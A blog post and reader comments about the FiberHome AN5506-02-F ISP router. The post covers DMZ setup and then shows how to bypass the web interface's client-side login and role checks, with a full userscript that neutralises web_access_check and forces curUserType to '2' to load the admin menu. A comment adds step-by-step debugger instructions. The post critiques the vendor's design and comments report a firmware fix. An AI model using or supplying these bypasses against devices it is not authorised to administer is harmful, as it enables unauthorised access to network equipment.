Sunday, July 9, 2017

FiberHome AN5506-02-F router hack

I recently had to work with a home fiber router supplied by the ISP, the FiberHome AN5506-02-F.

Compared to the previous internet access solution, which was based on a cable modem and required the user to bring their own router, the new solution has both advantages and disadvantages. Advantages: integrated WiFi and a built-in firewall. Disadvantages: only one LAN port available (100 Mbps), 2.4 GHz only (150 Mbps), outdated software, a locked-down interface, and no easy way to expose a second router.

The unit is very similar to the AN5506-04 model ( http://flytec.com.py/download/files/AN5506-04F-manual.pdf ), except it has only 2 UTP ports, only 1 phone port and no CATV interface.

Exposing the inner router


The old router now sits behind the FiberHome's NAT, so nothing on the Internet can reach it or the hosts behind it. The simplest way around this is to make the old router the FiberHome's DMZ host, which forwards all unsolicited inbound traffic to it. This is needed for things like web hosting, an FTP server, some chat clients, torrents, etc.

Log in with the standard username and password supplied by the ISP; admin rights are not needed for this. The UI is usually at http://192.168.1.1 . Note down the old router's MAC address, either from 'Status -> LAN -> DHCP Clients List' or from its label. Prefer the DHCP client list: the MAC printed on the label is not always the one the WAN port uses.

Add the MAC address to the static leases list, so that the old router always gets the same IP. It might not be strictly needed, but if the lease ever changes you do not want to end up exposing the wrong host to the Internet.



Add that IP address as the DMZ host.



From now on, any unsolicited traffic that reaches your public IP is forwarded to the old router, so the ports exposed to the Internet are whatever the old router exposes: its own port forwards plus any service it runs on its WAN side. If the old router is better maintained than the FiberHome, this is also a security improvement, but check that remote administration on the old router's WAN interface is switched off, because that interface is now reachable from the Internet.

There are also other ways to do this, but this one is the easiest. Not a hack, just poorly documented functionality.

Studying the firmware


The router home page uses a framed design, with the left frame (./left.asp) consisting of some hardcoded data and JS includes, and the right frame being the active UI.



The hardcoded data is a crude state machine that selects a skin or menu structure based on ISP-specific values.
"checkResult" holds the result of the login; every value except 1, 3, 4, 6 and 11 is treated as success, so setting it to 0 or 2 tells the JS that the user is logged in. The check is done in only one place, utils.js, so you can set a breakpoint at the entry point of that function and override the value:



Each time the script pauses at that line, set checkResult to an accepted value and press continue; most of the pages will happily load. You can automate this with a Tampermonkey script that replaces the checking function with a no-op:
web_access_check = function(i){}

We can already see two serious security problems: access control is enforced only on the client side, and it is enforced at a single checkpoint. Anything the browser decides can be changed by the person sitting at the browser, so a client-side check protects nothing; at best it hides menus.

Looking further at the XHR requests and responses, I could see that for this router/ISP combination an XML resource is being loaded:




It looks like the menu and submenu layout, which could also have been deduced from the JS code.
Changing 1.xml to 2.xml in the request yields an advanced menu:



Tracing back how this XML is loaded leads to another semi-hardcoded page:



Long story short: set a breakpoint just before Frame.show(), set curUserType to "2", and the admin version of the UI loads.



The exposed menu items are not interesting for a normal user (they don't add features, increase speed or anything else) and can brick the router if modified carelessly.
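The two manual steps above (neutralising web_access_check / checkResult in utils.js, and switching curUserType to "2" before Frame.show()) can be packaged as a single userscript. The following is an added example written for this page; it is not code from the router, the ISP or the original post. It assumes, as the console steps suggest, that checkResult, curUserType, web_access_check and Frame are plain globals on the page's window, and that Frame is assigned rather than declared with a function statement (a function declaration would replace the interceptor, leaving only the first two pins in effect). The simulatePageLoad function is a constructed stand-in for the page's boot sequence so the script can be exercised outside the browser; it is not the router's JavaScript.

```javascript
// ==UserScript==
// @name         AN5506-02-F client-side gate bypass (illustrative, assumed layout)
// @match        http://192.168.1.1/*
// @run-at       document-start
// @grant        unsafeWindow
// ==/UserScript==
'use strict';

// checkResult values that utils.js treats as a failed login, per the post.
// Every other value (0, 2, ...) is accepted.
const REJECTED_CHECK_RESULTS = new Set([1, 3, 4, 6, 11]);

function pageWouldAccept(checkResult) {
  return !REJECTED_CHECK_RESULTS.has(Number(checkResult));
}

// Pin a global to a fixed value. Later assignments by the page's own scripts
// hit the setter and are silently dropped, so the value survives utils.js.
function pinGlobal(win, name, value) {
  Object.defineProperty(win, name, {
    configurable: true,
    enumerable: true,
    get() { return value; },
    set() { /* ignore the page's writes */ },
  });
}

// Run `patch` on a global the moment the page assigns it (and immediately
// if it already exists). Used to wrap Frame.show() before it is ever called.
function onGlobalAssigned(win, name, patch) {
  let current = win[name];
  Object.defineProperty(win, name, {
    configurable: true,
    enumerable: true,
    get() { return current; },
    set(v) { current = patch(v); },
  });
  if (current !== undefined) current = patch(current);
}

function installBypass(win) {
  // 1. The single checkpoint: whatever utils.js installs, calls reach a no-op.
  pinGlobal(win, 'web_access_check', function () {});
  // 2. Every login result reads as accepted (2 is not in the rejected set).
  pinGlobal(win, 'checkResult', 2);
  // 3. The manual step "break before Frame.show(), set curUserType = '2'",
  //    automated: the wrapper sets it right before the original show() runs.
  onGlobalAssigned(win, 'Frame', (frame) => {
    if (frame && typeof frame.show === 'function') {
      const originalShow = frame.show;
      frame.show = function (...args) {
        win.curUserType = '2';
        return originalShow.apply(this, args);
      };
    }
    return frame;
  });
  return win;
}

// Constructed stand-in for the page's boot sequence (assumed, not the router's
// code): utils.js defines the checkpoint, the login result arrives, the
// checkpoint runs, then the menu is chosen from curUserType and the frame shown.
function simulatePageLoad(win, serverCheckResult) {
  win.web_access_check = function (result) {
    if (!pageWouldAccept(result)) throw new Error('redirected to login page');
  };
  win.checkResult = serverCheckResult;
  win.web_access_check(win.checkResult);
  win.curUserType = '1';                       // the role the server assigned
  win.Frame = {
    menu: null,
    show() { this.menu = win.curUserType === '2' ? '2.xml' : '1.xml'; },
  };
  win.Frame.show();
  return win.Frame.menu;                       // which menu layout was requested
}

// In the browser, patch the real page; under Node there is no window to patch.
const pageWindow = typeof unsafeWindow !== 'undefined' ? unsafeWindow
  : (typeof window !== 'undefined' ? window : null);
if (pageWindow) installBypass(pageWindow);
```

Install it with @run-at document-start so the pins exist before utils.js runs. The server may still gate 2.xml on its own session state: if the XHR for it is redirected to the login page, the menu stays empty and no client-side patch will change that. That is also the only real fix for the vendor: enforce the role on every CGI and XML endpoint, not in the page.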

I haven't played much more with this, but I suspect the unit might be susceptible to some basic attacks: directory traversal, RCE, privilege escalation, ...

There are some other topics that are left as an exercise for the reader: switching to different skins and languages, dumping the file system, finding out the admin username/password combination.

33 comments:

  1. Thank you for the tutorial. I find it very useful. I have enabled the second LAN 2 port and I will test it to see if it works in the future. Or maybe I can switch it to bridge mode and connect the old router.

    Replies
    1. So I have checked LAN 2 and it is only working at 100 Mbps. Pretty good if you need it for a Raspberry or TV. In the end I switched it to bridge mode and use my Gigabit router.

    2. Hi,

      Did you manage to configure just the LAN 2 port in bridge mode?
      Thanks.

  2. Is there a more "detailed" step by step on how to do it? For dummies like me.

  3. Oh, I got access but it's not admin. Is there any way to find out the admin user/password?

    Replies
    1. I haven't tried to find the default admin login or password. It probably requires access to the filesystem and some way of decoding the "/etc/shadow" file. Or perhaps the password is hardcoded in the CGI scripts.

  4. hi, i'm currently looking for 2.xml, will you be able to send it over to me please?

  5. I can't access it anymore as admin. Has something changed in the last few days or is it just me? Or maybe it has to do with the fact that I changed the login "user" and "pass"?

    Replies
    1. The router might reset to its default user and password after a reset.

  6. Hello,

    I have tried exactly what you said ' setting a breakpoint just before Frame.show() and setting curUserType to "2" will load the admin version of the UI.' but it returns an error and the menu/website is empty:
    https://imgur.com/Rx9oq8V
    https://imgur.com/a/5qSzD

    Greetings from Romania :)

    Replies
    1. Strange. Perhaps you need to log in once with the normal user then try the breakpoint and set. Can't remember right now and don't have the router on-hand, but I can walk you through it.
      Otherwise, just set a breakpoint on the line with the error and see what the "request" object looks like. Just type "request" into the console or mouse over the variable.

  7. I tried that, but with the same result.
    If you could help me and maybe guide me through it, that would be great.
    I tried to further debug this:
    It seems that it cannot load 2.xml (the file you exposed in your article). I even tried manually accessing the 2.xml file link, but it redirects me automatically to the login page. The line at which the error occurs is the following: this.data = this._getSubMenus(1, request.responseXML.documentElement);
    I manually tried to see the contents of the responseXML array, setting curUserType=1 and curUserType=2. It seems like if the variable = 1, then the array contains the menu links, and if the variable = 2, then the array is empty.

    Thanks

    Replies
    1. Try to login first with the normal user, then try the hack. I think it's user/user or user/digi, should be written on the modem or the installation piece of paper.

  8. Yep, I did log in first with the normal user. Does it make a difference that I changed the default one? :) See screenshots with all the steps I did, with descriptions:
    https://imgur.com/a/etnFt
    Thanks

    Replies
    1. I have the same error, exactly like in the screenshot. Ligius, you can remotely enter via TeamViewer on my computer, or on Alex Stockel's PC, to try if you don't have a physical router?

    2. We can perhaps set up a chat at a certain time, let's say Monday 15 Jan at 21:00 CET. For example https://bloochat.com/rb6ms . We can go further from there with TeamViewer.

    3. Any luck resolving this? I'm encountering the same issue as Alex and Vlad. thanks

    4. The new firmware has fixed this vulnerability

  9. Hello. I have the same router and the following setup:
    1. Android phone connected to WiFi
    2. Samsung TV connected to RJ45 (wired LAN) with DLNA
    The Android phone doesn't see the TV. Any thoughts on this? I guess the LAN ports are filtered?!
    PS: the same setup but with a different router works.

  10. This comment has been removed by the author.

  11. I've checked it again via vpn, it works. I can make a video/screencast step-by-step but it should be like this:
    1) load the page. Open menu_romania.asp. Set a breakpoint on line 26.
    2) if you have the default user/password you can log in, skip to step 3.
    3) refresh (f5)
    4) no user/pass. Load the page, load the menu_romania.js in debugger.
    5) Set a breakpoint on line 331. Try to log in with any user.
    6) once the script breaks, type checkResult=2 in the console. Hit F8 to resume the script
    7) the script should now break in the asp file, line 26. Type curUserType="2"
    8) resume (F8)
    You should now see the admin menu.

  12. Hi Ligius, I tried to do it with this method, but I don't have the menu_romania.js; I only have frame_romania.js and it has only 288 lines. I don't know if you can help me.

  13. Hi Ligius,
    Same problem here, as explained by Alex R.
    Can you kindly make a screencast?
    Thanks

  14. Hi, the same problem: we don't have menu_romania.js, just frame_romania.js

    Replies
    1. Try to save the page: Ctrl+S, "complete" and upload it somewhere so I can take a look at it until I get access to a unit. You can use zippyshare, dropbox or anything else.

  15. Same problem here. Ligius, please give me your mail, I want to speak about something with you

    Replies
    1. Write me at my first name @gmail.com . I need access to one of those "new" routers to figure out if anything's changed. Sorry I haven't had time to respond to all replies, new job.

    2. Hi Ligius, I have a FiberHome AN5506-04-GG, I want to know how to open the ports for a DVR

    3. I went with Claudiu over his router, and, after a remotely-pushed update, the vulnerability above is not present anymore.
